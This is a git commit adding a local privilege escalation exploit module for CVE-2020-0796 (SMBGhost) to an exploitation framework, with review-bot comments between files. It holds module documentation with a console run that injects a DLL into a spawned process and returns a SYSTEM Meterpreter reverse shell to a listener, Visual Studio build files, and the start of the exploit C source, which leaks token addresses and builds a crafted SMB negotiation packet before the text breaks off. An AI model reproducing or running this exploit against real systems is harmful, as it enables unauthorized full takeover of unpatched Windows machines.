Land #13187, Add LPE Exploit For CVE-2020-0796 (AKA: SMBGhost)
Merge branch 'land-13187' into upstream-master
This commit is contained in:
commit
182bd67287
Binary file not shown.
|
@ -0,0 +1,102 @@
|
|||
## Vulnerable Application
|
||||
A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3)
|
||||
protocol that can be leveraged to execute code on a vulnerable server. This
|
||||
local exploit implementation leverages this flaw to elevate itself before
|
||||
injecting a payload into winlogon.exe.
|
||||
|
||||
This vulnerability was patched in March 2020 but prior to that enough
|
||||
information was publicly available to trigger a crash which led to pre-patch
|
||||
workarounds. The official recommendation from [Microsoft][1] at the time was to
|
||||
disable SMBv3 compression, a feature which this exploit relies on. The module's
|
||||
check method will determine this value using the registry to identify whether or
|
||||
not compression has been disabled.
|
||||
|
||||
Other recommendations included restricting access to TCP port 445 via firewalls.
|
||||
Given that this is a local exploit and the connection is made to the local host
|
||||
this is likely an ineffective measure against this particular implementation of
|
||||
the vulnerability.
|
||||
|
||||
### Installation And Setup
|
||||
Windows 10 versions 1903 and 1909 (without the patch) are vulnerable out of the
|
||||
box. The default setting is to have SMBv3 compression enabled.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Get a Meterpreter session on a vulnerable host
|
||||
1. Do: `use exploit/windows/local/cve_2020_0796_smbghost`
|
||||
1. Set the `SESSION` and `PAYLOAD` options
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 10 Version 1909 Build 18363.418 x64
|
||||
|
||||
```
|
||||
msf5 exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: DESKTOP-PKLKKF7\user
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-PKLKKF7
|
||||
OS : Windows 10 (10.0 Build 18363).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 5
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > getsystem
|
||||
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
|
||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||
[-] Named Pipe Impersonation (Dropper/Admin)
|
||||
[-] Token Duplication (In Memory/Admin)
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf5 exploit(windows/local/cve_2020_0796_smbghost) > show options
|
||||
|
||||
Module options (exploit/windows/local/cve_2020_0796_smbghost):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION -1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Windows 10 v1903-1909 x64
|
||||
|
||||
|
||||
msf5 exploit(windows/local/cve_2020_0796_smbghost) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[*] Windows Build Number = 18363
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Launching notepad to host the exploit...
|
||||
[+] Process 4508 launched.
|
||||
[*] Reflectively injecting the exploit DLL into 4508...
|
||||
[*] Injecting exploit into 4508...
|
||||
[*] Exploit injected. Injecting payload into 4508...
|
||||
[*] Payload injected. Executing exploit...
|
||||
[*] Sending stage (206403 bytes) to 192.168.159.153
|
||||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005
|
|
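Review bot: The "Vulnerable Application" text says the check method reads the registry to see whether SMBv3 compression was disabled, but the sample run only prints "Windows Build Number = 18363" before declaring the target vulnerable; document the build-number range the check accepts (the target list says v1903-1909) and what the module reports when compression has been disabled, since that registry change is the one pre-patch mitigation that still applies to this loopback variant. A stability and artifact note also belongs in the documentation: the exploit corrupts kernel memory over a loopback SMB connection (exploit.c sends a 0xFFFFFFFF decompressed-size header and aims a write at the process token), so a failed attempt is not a clean error return, and a successful run leaves the spawned notepad.exe host process plus a thread injected into winlogon.exe behind, which is exactly what a defender reviewing this activity would look for.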
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.29926.136
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2020-0796", "CVE-2020-0796.vcxproj", "{7282AA86-42B1-4C57-BC33-C01C9233FA5F}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x64.Build.0 = Debug|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Debug|x86.Build.0 = Debug|Win32
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x64.ActiveCfg = Release|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x64.Build.0 = Release|x64
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x86.ActiveCfg = Release|Win32
|
||||
{7282AA86-42B1-4C57-BC33-C01C9233FA5F}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {485543BE-F94B-499F-95FD-AF81E8ED9B1E}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
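Review bot: The solution declares Debug|x86 and Release|x86 configurations, but exploit.c assumes a 64-bit process (it writes 8-byte pointers with *(uint64_t*) and walks the x64 SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX layout) and the module's only target is "Windows 10 v1903-1909 x64". Either drop the Win32 configurations here and in the vcxproj, or state in the documentation that only the x64 DLL is built and shipped, so nobody builds and tries to use the x86 variant.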
@ -0,0 +1,252 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<ProjectGuid>{7282AA86-42B1-4C57-BC33-C01C9233FA5F}</ProjectGuid>
|
||||
<RootNamespace>CVE20200796</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<TargetExt>.dll</TargetExt>
|
||||
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<EnableCOMDATFolding>
|
||||
</EnableCOMDATFolding>
|
||||
<OptimizeReferences>
|
||||
</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
<PreLinkEvent>
|
||||
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||
IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
|
||||
mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
|
||||
</PreLinkEvent>
|
||||
<PostBuildEvent>
|
||||
<Command>IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
|
||||
mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<EnableCOMDATFolding>
|
||||
</EnableCOMDATFolding>
|
||||
<OptimizeReferences>
|
||||
</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<AdditionalDependencies>ntdll.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)\cve-2020-0796.map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)\cve-2020-0796.lib</ImportLibrary>
|
||||
</Link>
|
||||
<PreLinkEvent>
|
||||
<Command>
|
||||
</Command>
|
||||
</PreLinkEvent>
|
||||
<PostBuildEvent>
|
||||
<Command>IF EXIST "..\..\..\..\data\exploits\CVE-2020-0796\" GOTO COPY
|
||||
mkdir "..\..\..\..\data\exploits\CVE-2020-0796\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\CVE-2020-0796\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="exploit.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="exploit.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
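Review bot: The Release|Win32 ItemDefinitionGroup has a PreLinkEvent that runs editbin.exe on "$(TargetDir)$(TargetFileName)" and copies it into data\exploits\CVE-2020-0796\ before the linker has produced the file, while the Release|x64 group leaves its PreLinkEvent Command empty and copies only in PostBuildEvent; the Win32 PreLinkEvent will either fail on a clean build or copy a stale binary, and the PostBuildEvent already does the copy. Remove the PreLinkEvent Command from Release|Win32 (moving the editbin call into the PostBuildEvent if /OSVERSION:5.0 is still wanted) so both platforms behave the same. Smaller points: `_CONSOLE` is defined for a DynamicLibrary with SubSystem Windows and can go, and the empty `<SDLCheck>`, `<EnableCOMDATFolding>` and `<OptimizeReferences>` elements should either carry a value or be deleted. BufferSecurityCheck=false and RandomizedBaseAddress=false are deliberate for a reflectively loaded DLL, but a one-line comment saying so would save the next reviewer the question.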
@ -0,0 +1,366 @@
|
|||
/*
|
||||
* CVE-2020-0796 LPE
|
||||
*
|
||||
* Daniel Garcia Gutierrez (@danigargu) - danigargu[at]gmail.com
|
||||
* Manuel Blanco Parajon (@dialluvioso) - dialluvioso[at]protonmail.com
|
||||
* Date: 03/29/2020
|
||||
*
|
||||
**/
|
||||
|
||||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
#include <winsock2.h>
|
||||
#include <ws2tcpip.h>
|
||||
#include <windows.h>
|
||||
#include <TlHelp32.h>
|
||||
#include "exploit.h"
|
||||
|
||||
typedef struct _MSF_PAYLOAD {
|
||||
DWORD dwSize;
|
||||
CHAR cPayloadData[];
|
||||
} MSF_PAYLOAD;
|
||||
typedef MSF_PAYLOAD* PMSF_PAYLOAD;
|
||||
|
||||
ULONG64 get_handle_addr(HANDLE h) {
|
||||
ULONG len = 20;
|
||||
NTSTATUS status = (NTSTATUS)0xc0000004;
|
||||
PSYSTEM_HANDLE_INFORMATION_EX pHandleInfo = NULL;
|
||||
|
||||
HMODULE ntdll = GetModuleHandle("ntdll.dll");
|
||||
if (ntdll == NULL) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
fpNtQuerySystemInformation NtQuerySystemInformation = (fpNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
|
||||
if (NtQuerySystemInformation == NULL) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
do {
|
||||
len *= 2;
|
||||
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)GlobalAlloc(GMEM_ZEROINIT, len);
|
||||
status = NtQuerySystemInformation(SystemExtendedHandleInformation, pHandleInfo, len, &len);
|
||||
} while (status == (NTSTATUS)0xc0000004);
|
||||
|
||||
if (status != (NTSTATUS)0x0) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
DWORD mypid = GetProcessId(GetCurrentProcess());
|
||||
ULONG64 ptrs[1000] = { 0 };
|
||||
for (int i = 0; i < pHandleInfo->NumberOfHandles; i++) {
|
||||
PVOID object = pHandleInfo->Handles[i].Object;
|
||||
ULONG_PTR handle = pHandleInfo->Handles[i].HandleValue;
|
||||
DWORD pid = (DWORD)pHandleInfo->Handles[i].UniqueProcessId;
|
||||
if (pid != mypid)
|
||||
continue;
|
||||
if (handle == (ULONG_PTR)h)
|
||||
return (ULONG64)object;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
ULONG64 get_process_token() {
|
||||
HANDLE token;
|
||||
HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
|
||||
if (proc == INVALID_HANDLE_VALUE)
|
||||
return 0;
|
||||
|
||||
OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token);
|
||||
return get_handle_addr(token);
|
||||
}
|
||||
|
||||
int error_exit(SOCKET sock) {
|
||||
WSACleanup();
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
int send_negotiation(SOCKET sock) {
|
||||
int err = 0;
|
||||
char response[8] = { 0 };
|
||||
|
||||
const uint8_t buf[] = {
|
||||
/* NetBIOS Wrapper */
|
||||
0x00, /* session */
|
||||
0x00, 0x00, 0xC4, /* length */
|
||||
|
||||
/* SMB Header */
|
||||
0xFE, 0x53, 0x4D, 0x42, /* protocol id */
|
||||
0x40, 0x00, /* structure size, must be 0x40 */
|
||||
0x00, 0x00, /* credit charge */
|
||||
0x00, 0x00, /* channel sequence */
|
||||
0x00, 0x00, /* channel reserved */
|
||||
0x00, 0x00, /* command */
|
||||
0x00, 0x00, /* credits requested */
|
||||
0x00, 0x00, 0x00, 0x00, /* flags */
|
||||
0x00, 0x00, 0x00, 0x00, /* chain offset */
|
||||
0x00, 0x00, 0x00, 0x00, /* message id */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, /* reserved */
|
||||
0x00, 0x00, 0x00, 0x00, /* tree id */
|
||||
0x00, 0x00, 0x00, 0x00, /* session id */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, /* signature */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
|
||||
/* SMB Negotiation Request */
|
||||
0x24, 0x00, /* structure size */
|
||||
0x08, 0x00, /* dialect count, 8 */
|
||||
0x00, 0x00, /* security mode */
|
||||
0x00, 0x00, /* reserved */
|
||||
0x7F, 0x00, 0x00, 0x00, /* capabilities */
|
||||
0x01, 0x02, 0xAB, 0xCD, /* guid */
|
||||
0x01, 0x02, 0xAB, 0xCD,
|
||||
0x01, 0x02, 0xAB, 0xCD,
|
||||
0x01, 0x02, 0xAB, 0xCD,
|
||||
0x78, 0x00, /* negotiate context */
|
||||
0x00, 0x00, /* additional padding */
|
||||
0x02, 0x00, /* negotiate context count */
|
||||
0x00, 0x00, /* reserved 2 */
|
||||
0x02, 0x02, /* dialects, SMB 2.0.2 */
|
||||
0x10, 0x02, /* SMB 2.1 */
|
||||
0x22, 0x02, /* SMB 2.2.2 */
|
||||
0x24, 0x02, /* SMB 2.2.3 */
|
||||
0x00, 0x03, /* SMB 3.0 */
|
||||
0x02, 0x03, /* SMB 3.0.2 */
|
||||
0x10, 0x03, /* SMB 3.0.1 */
|
||||
0x11, 0x03, /* SMB 3.1.1 */
|
||||
0x00, 0x00, 0x00, 0x00, /* padding */
|
||||
|
||||
/* Preauth context */
|
||||
0x01, 0x00, /* type */
|
||||
0x26, 0x00, /* length */
|
||||
0x00, 0x00, 0x00, 0x00, /* reserved */
|
||||
0x01, 0x00, /* hash algorithm count */
|
||||
0x20, 0x00, /* salt length */
|
||||
0x01, 0x00, /* hash algorith, SHA512 */
|
||||
0x00, 0x00, 0x00, 0x00, /* salt */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, /* pad */
|
||||
|
||||
/* Compression context */
|
||||
0x03, 0x00, /* type */
|
||||
0x0E, 0x00, /* length */
|
||||
0x00, 0x00, 0x00, 0x00, /* reserved */
|
||||
